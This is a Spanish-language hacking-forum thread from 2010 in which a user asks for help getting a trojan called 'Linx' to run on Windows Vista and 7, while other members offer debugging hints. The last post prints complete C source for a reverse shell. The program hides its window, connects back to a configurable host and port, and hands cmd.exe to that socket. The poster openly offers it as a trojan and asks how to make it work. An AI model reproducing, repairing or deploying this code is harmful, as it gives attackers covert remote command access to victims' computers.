Tema destacado: [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware
 Autor
|
Tema: [C] [!!! HELP !!!] ¿Troyanos en Windows Vista / 7? ¿Que cambia? [SIN RESOLVER] (Leído 2,128 veces)
|
Garfield07
 Desconectado
Mensajes: 1.123
¡Este año voy a por todas! JMJ 2011
|
Buenas, el otro dia me puse a pasar "Linx" a Windows Vista, para mas utilidad... Ya me entienden.
El caso es que al abrir no funciona correctamente... Podrian postear el fallo por favor?
Que falla para que no corra?
Espero respuestas. Gracias por adelantado!
PD: Code abajo...
|
|
|
|
« Última modificación: 27 Diciembre 2010, 18:35 por Sagrini »
|
En línea
|
 * Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo |
|
|
|
Eternal Idol
|
Depuralo hasta comprender donde y como falla.
|
|
|
|
|
En línea
|
 La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste. Juan Domingo Perón |
|
|
[L]ord [R]NA
Desconectado
Mensajes: 1.507
El Dictador y Verdugo de H-Sec
|
Primero empieza por decir en que falla.
|
|
|
|
|
En línea
|
|
|
|
Garfield07
Desconectado
Mensajes: 1.123
¡Este año voy a por todas! JMJ 2011
|
Bueno, fallo mio y disculpas a todos...
De acuerdo, falla aqui:
[code=c]
CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc); [/code] Los fallos son que no se ejecutan correctamente. Todo lo demas, paso a paso, ha sido repasado, buggeado y probado por mi. Todas las demas instrucciones anteriores a esta son correctas. Todos los descriptores se cierran, todo se declara y define... todo. Sigo probando, pero creo que esta mal algo en el procedimiento anterior a las funciones que fallan. Sencillamente en Vista el procedimiento no es correcto, aqui nos tenemos que inventar algo nuevo... La cosa es que cambia respecto a XP, pues en XP funciona 100%. A lo mejor ahora hay algo que cerrar, algo que declarar... Muchisimas gracias, sigan posteando! PD: Modifico con alguna cosilla.. Code abajo.
|
|
|
|
« Última modificación: 31 Diciembre 2010, 17:41 por Sagrini »
|
En línea
|
* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo |
|
|
|
Eternal Idol
|
¿Y que dice GetLastError?  |
|
|
|
|
En línea
|
La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste. Juan Domingo Perón |
|
|
Garfield07
Desconectado
Mensajes: 1.123
¡Este año voy a por todas! JMJ 2011
|
0 y 0, respectivamente  Por que no corren!!! |
|
|
|
|
En línea
|
* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo |
|
|
|
Eternal Idol
|
¿Y CreateProcess devuelve true (1)?
|
|
|
|
|
En línea
|
La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste. Juan Domingo Perón |
|
|
[L]ord [R]NA
Desconectado
Mensajes: 1.507
El Dictador y Verdugo de H-Sec
|
execve() si no me equivoco no funciona en windows.
|
|
|
|
|
En línea
|
|
|
|
Garfield07
Desconectado
Mensajes: 1.123
¡Este año voy a por todas! JMJ 2011
|
Sep, CreateProcess da 1, pero no ejecuta nada...
Sin embargo, es verdad, execve no va en Windows.
Que alternativa puedo usar a execve?
Que pasa con CreateProcess? Por que no ejecuta nada?
Muchisimas gracias por sus respuestas...
|
|
|
|
« Última modificación: 23 Diciembre 2010, 16:02 por Sagrini »
|
En línea
|
* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo |
|
|
|
|
Garfield07
Desconectado
Mensajes: 1.123
¡Este año voy a por todas! JMJ 2011
|
Muchas gracias por responder, pero no me funciona.. Alguien tiene otra idea?
PD: De todos modos muchas gracias!
|
|
|
|
« Última modificación: 24 Diciembre 2010, 14:00 por Sagrini »
|
En línea
|
* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo |
|
|
paju1986
Desconectado
Mensajes: 115
http://www.albertinux.com
|
Bueno yo utilizo las librerias Qt y ejecuto cosas con QProcess::execute(nombreprograma) pero tampoco me funciona, ¿Puede que todo esto esté relacionado con algún asunto de seguridad en Widnows?
|
|
|
|
|
En línea
|
|
|
|
Garfield07
Desconectado
Mensajes: 1.123
¡Este año voy a por todas! JMJ 2011
|
No, no funciona tampoco xD... Y mas que ser de seguridad Windows, creo que es la forma en la que se hace... no es correcta. llevo 3 dias enteros con el problemita xD... podrian ayudarme? Alguna otra respuestas? Muchas gracias! Pd: Feliz navidad! Lh: No hagas doble post. Utiliza el botón modificar.Bueno, alguien me puede decir al menos si le funciona en 7? Y en Vista? Y en XP SP3? Necesito ayuda!!! El code final es este... He probado a abrirlo como admin, y nada.... Alguna idea? Bueno, que code usan ustedes en Vista / 7? #include <time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
struct sockaddr_in host;
SOCKET sockfd;
int main (int argc, char *argv [])
{
ShowWindow (GetForegroundWindow (), SW_HIDE);
WSADATA wsa;
WSAStartup(MAKEWORD(2,2),&wsa);
host.sin_addr.s_addr = inet_addr ("127.0.0.1"); // A modificar!
host.sin_port = htons (31337); //Igualmente!
host.sin_family = AF_INET;
memset (host.sin_zero, 0, 8);
if ((sockfd = socket (2, 1, 0)) == -1) return 1;
while (connect (sockfd, (struct sockaddr*)&host, sizeof (struct sockaddr))) Sleep (1);
PROCESS_INFORMATION info_proc;
STARTUPINFO start_proc;
memset(&start_proc,0,sizeof(start_proc));
start_proc.cb=sizeof(start_proc);
start_proc.dwFlags=STARTF_USESTDHANDLES;
start_proc.hStdInput = start_proc.hStdOutput = start_proc.hStdError = (HANDLE)sockfd;
CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc);
closesocket (sockfd);
return 0;
}
|
|
|
|
« Última modificación: 30 Diciembre 2010, 21:18 por Littlehorse »
|
En línea
|
* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo |
|
|
|
 |
